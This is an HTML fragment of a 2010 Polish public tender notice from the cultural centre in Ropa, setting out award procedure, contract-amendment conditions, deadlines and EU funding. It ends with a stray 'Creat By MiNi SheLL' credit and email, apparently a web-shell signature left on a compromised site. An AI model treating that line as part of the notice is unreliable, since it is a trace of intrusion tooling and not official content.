2. Wypełniony i podpisany formularz kosztorysu ofertowego - wg załącznika nr 2 do SIWZ,
3. Zaakceptowany wzór umowy - wg załącznika nr 5 do SIWZ,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne postanowienia do umowy zawiera wzór umowy - załącznik Nr 5 do SIWZ.
2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia
2.1 Zmiana terminu realizacji przedmiotu umowy
a) zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności:
a.1. klęski żywiołowe;
a.2. warunki atmosferyczne uniemożliwiające realizację zamówienia, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi

2.2. Zmiana sposobu spełnienia świadczenia - zmiany technologiczne, w szczególności:
a) niedostępność na rynku elementów, urządzeń lub materiałów wskazanych w specyfikacji spowodowana zaprzestaniem produkcji lub ich wycofaniem z rynku;
b) pojawienie się na rynku elementów, urządzeń lub materiałów nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
c) pojawienie się nowszej technologii wykonania robót pozwalającej na zaoszczędzenie czasu montażu lub demontażu elementów będących przedmiotem dostawy;
d) konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w specyfikacji, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem zamówienia,
e) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub materiałów ze względu na zmiany obowiązującego prawa.

2.3. Zmiany osobowe:
a) zmiana podwykonawcy, przy pomocy którego wykonawca wykonuje przedmiot umowy;
b) rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, zmniejszenia należnego wykonawcy wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w SIWZ. Zmiana ta nie może dotyczyć czynności, które zgodnie z SIWZ muszą być wykonane przez wykonawcę osobiście. 

2.4. Pozostałe zmiany 
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b) zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zwiększenie lub zmniejszenie kosztów wykonania umowy po stronie wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę. 
c) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji zamówienia;
d) rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 

3. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
b) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy stronami;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gok.ropa.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Kultury w Ropie, 38 - 312 Ropa   
tel. (018) 353-06-11, fax. (018) 353-06-11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2010 godzina 09:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Gminnym Ośrodku Kultury w Ropie, 38 - 312 Ropa. (Siedziba: Budynek Gimnazjum w Ropie - wejście od strony stadionu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt dofinansowany ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich, w ramach działania Odnowa i Rozwój Wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com